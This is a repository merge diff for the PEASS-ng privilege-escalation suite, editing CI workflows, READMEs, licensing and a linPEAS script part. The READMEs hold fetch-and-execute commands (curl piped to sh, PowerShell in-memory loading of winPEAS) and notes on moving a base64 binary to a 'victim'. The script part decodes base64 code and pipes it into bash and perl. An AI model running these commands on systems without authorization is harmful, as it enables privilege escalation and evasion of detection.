Merge e1b1421bdb into 24b6713641

.github/workflows/CI-master_tests.yml

@@ -84,9 +84,9 @@ jobs:
       # copy the files
       - name: Copy Dotfuscator generated files
         run: |
-            cp $env:DotFuscatorGeneratedPath\x64\winPEASx64.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64_ofs.exe"            
-            cp $env:DotFuscatorGeneratedPath\x86\winPEASx86.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86_ofs.exe"
-            cp $env:DotFuscatorGeneratedPath\any\winPEASany.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany_ofs.exe"
+            cp $env:DotFuscatorGeneratedPath\x64\winPEASx64.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64.exe"            
+            cp $env:DotFuscatorGeneratedPath\x86\winPEASx86.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86.exe"
+            cp $env:DotFuscatorGeneratedPath\any\winPEASany.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany.exe"
       
       # Upload all the versions for the release
       - name: Upload winpeasx64
@@ -111,19 +111,19 @@ jobs:
         uses: actions/upload-artifact@v2
         with:
           name: winPEASx64_ofs.exe
-          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64_ofs.exe
+          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64.exe
       
       - name: Upload winpeasx86ofs
         uses: actions/upload-artifact@v2
         with:
           name: winPEASx86_ofs.exe
-          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86_ofs.exe
+          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86.exe
           
       - name: Upload winpeasanyofs
         uses: actions/upload-artifact@v2
         with:
           name: winPEASany_ofs.exe
-          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany_ofs.exe
+          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany.exe
       
       - name: Upload winpeas.bat
         uses: actions/upload-artifact@v2
@@ -196,7 +196,7 @@ jobs:
       
       # Run linpeas as a test
       - name: Run linpeas
-        run: linPEAS/linpeas.sh -a -D
+        run: linPEAS/linpeas.sh -t -e
       
       # Upload files for release
       - name: Upload linpeas.sh
@@ -283,7 +283,7 @@ jobs:
       
       # Run macpeas parts to test it
       - name: Run macpeas
-        run: linPEAS/linpeas.sh -D -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information
+        run: linPEAS/linpeas.sh -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information
 
      
   Publish_release:
@@ -292,21 +292,6 @@ jobs:
 
     steps:
     # Download files to release
-    - name: Download winpeasx64ofs
-      uses: actions/download-artifact@v2
-      with:
-        name: winPEASx64_ofs.exe
-
-    - name: Download winpeasx86ofs
-      uses: actions/download-artifact@v2
-      with:
-        name: winPEASx86_ofs.exe
-
-    - name: Download winpeasanyofs
-      uses: actions/download-artifact@v2
-      with:
-        name: winPEASany_ofs.exe
-
     - name: Download winpeasx64
       uses: actions/download-artifact@v2
       with:
@@ -321,6 +306,21 @@ jobs:
       uses: actions/download-artifact@v2
       with:
         name: winPEASany.exe
+
+    - name: Download winpeasx64ofs
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEASx64_ofs.exe
+
+    - name: Download winpeasx86ofs
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEASx86_ofs.exe
+
+    - name: Download winpeasanyofs
+      uses: actions/download-artifact@v2
+      with:
+        name: winPEASany_ofs.exe
     
     - name: Download winpeas.bat
       uses: actions/download-artifact@v2

README.md

@@ -19,7 +19,7 @@ These tools search for possible **local privilege escalation paths** that you co
 - **[LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**
 
 ## Quick Start
-Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/tag/refs%2Fheads%2Fmaster)**.
 
 ## Let's improve PEASS together
 
@@ -34,5 +34,8 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
 All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
 
 
+## License
+
+MIT License
 
 By Polop<sup>(TM)</sup>

linPEAS/README.md

@@ -13,13 +13,11 @@ Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks
 Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed**
 
 ## Quick Start
-Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/tag/refs%2Fheads%2Fmaster)**.
 
 ```bash
 # From github
-LATEST_RELEASE=$(curl -L -s -H 'Accept: application/json' https://github.com/carlospolop/PEASS-ng/releases/latest)
-LATEST_VERSION=$(echo $LATEST_RELEASE | sed -e 's/.*"tag_name":"\([^"]*\)".*/\1/')
-curl -L https://github.com/carlospolop/PEASS-ng/releases/download/$LATEST_VERSION/linpeas.sh | sh
+curl -L https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fheads%2Fmaster/linpeas.sh | sh
 ```
 
 ```bash
@@ -205,5 +203,8 @@ If you find any issue, please report it using **[github issues](https://github.c
 
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
+## License
 
-By Polop<sup>(TM)</sup>
+MIT License
+
+By Polop<sup>(TM)</sup>

linPEAS/builder/linpeas_parts/1_system_information.sh

@@ -122,10 +122,9 @@ if [ "$(command -v bash 2>/dev/null)" ]; then
     print_2title "Executing Linux Exploit Suggester"
     print_info "https://github.com/mzet-/linux-exploit-suggester"
     les_b64="peass{LES}"
+    echo $les_b64 | base64 -d | bash
     if [ "$EXTRA_CHECKS" ]; then
-        echo $les_b64 | base64 -d | bash -s -- --checksec | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | sed -E "s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g"
-    else
-        echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,\[CVE-[0-9]+-[0-9]+\],*,${SED_RED},g"
+        echo $les_b64 | base64 -d | bash -s -- --checksec
     fi
     echo ""
 fi
@@ -134,7 +133,7 @@ if [ "$(command -v perl 2>/dev/null)" ]; then
     print_2title "Executing Linux Exploit Suggester 2"
     print_info "https://github.com/jondonas/linux-exploit-suggester-2"
     les2_b64="peass{LES2}"
-    echo $les2_b64 | base64 -d | perl | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
+    echo $les2_b64 | base64 -d | perl
     echo ""
 fi
 

winPEAS/README.md

@@ -7,7 +7,7 @@ Check the **Local Windows Privilege Escalation checklist** from **[book.hacktric
 Check more **information about how to exploit** found misconfigurations in **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation)**
 
 ## Quick Start
-Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/tag/refs%2Fheads%2Fmaster)**.
 
 ## WinPEAS .exe and .bat
 - [Link to WinPEAS .bat project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASbat) 
@@ -26,4 +26,8 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
 
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
+## License
+
+MIT License
+
 By Polop<sup>(TM)</sup>

winPEAS/winPEASbat/README.md

@@ -137,5 +137,8 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
 
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
+## License
+
+MIT License
 
 By Polop<sup>(TM)</sup>

winPEAS/winPEASexe/README.md

@@ -13,27 +13,22 @@ Check also the **Local Windows Privilege Escalation checklist** from **[book.hac
 **.Net >= 4.5.2 is required**
 
 Precompiled binaries:
-- Download the **[latest obfuscated and not obfuscated versions from here](https://github.com/carlospolop/PEASS-ng/releases/latest)** or **compile it yourself** (read instructions for compilation).
+- Download the **[latest obfuscated and not obfuscated versions from here](https://github.com/carlospolop/PEASS-ng/releases/tag/refs%2Fheads%2Fmaster)** or **compile it yourself** (read instructions for compilation).
 
 ```bash
-# Get latest release
-$latestRelease = Invoke-WebRequest https://github.com/carlospolop/PEASS-ng/releases/latest -Headers @{"Accept"="application/json"}
-$json = $latestRelease.Content | ConvertFrom-Json
-$latestVersion = $json.tag_name
-$url = "https://github.com/carlospolop/PEASS-ng/releases/download/$latestVersion/winPEASany_ofs.exe"
+#One liner to download and execute winPEASany from memory in a PS shell
+$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fheads%2Fmaster/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
 
-# One liner to download and execute winPEASany from memory in a PS shell
-$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
-
-# Before cmd in 3 lines
+#Before cmd in 3 lines
+$url = "https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fheads%2Fmaster/winPEASany_ofs.exe"
 $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content));
 [winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
 
-# Load from disk in memory and execute:
+#Load from disk in memory and execute:
 $wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS.exe")));
 [winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
 
-# Load from disk in base64 and execute
+#Load from disk in base64 and execute
 ##Generate winpeas in Base64:
 [Convert]::ToBase64String([IO.File]::ReadAllBytes("D:\Users\user\winPEAS.exe")) | Out-File -Encoding ASCII D:\Users\user\winPEAS.txt
 ##Now upload the B64 string to the victim inside a file or copy it to the clipboard
@@ -46,7 +41,7 @@ $thecontent = "aaaaaaaa..." #Where "aaa..." is the winpeas base64 string
 $wp = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($thecontent))
 [winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
 
-# Loading from file and executing a winpeas obfuscated version
+#Loading from file and executing a winpeas obfuscated version
 ##Load obfuscated version
 $wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS-Obfuscated.exe")));
 $wp.EntryPoint #Get the name of the ReflectedType, in obfuscated versions sometimes this is different from "winPEAS.Program"
@@ -284,5 +279,8 @@ If you find any issue, please report it using **[github issues](https://github.c
 
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
+## License
+
+MIT License
 
 By Polop<sup>(TM)</sup>, makikvues (makikvues2[at]gmail[dot].com)